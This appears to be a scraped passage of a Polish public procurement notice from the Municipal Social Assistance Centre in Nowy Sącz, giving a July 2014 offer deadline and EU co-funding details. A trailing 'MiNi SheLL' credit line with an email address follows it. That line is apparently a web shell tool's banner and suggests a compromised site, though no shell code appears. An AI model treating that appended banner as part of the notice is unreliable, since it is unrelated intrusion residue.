<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2014 godzina 08:30, miejsce: Miejski Ośrodek Pomocy Społecznej, ul. Żywiecka 13, 33-300 Nowy Sącz - SEKRETARIAT pok. 209..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach Programu Rewitalizacji Społecznej  pn. Integruj-My-się! Sądecki start w nowe możliwości realizowany w ramach Działania 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej, Priorytetu I Zatrudnienie i integracja społeczna Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com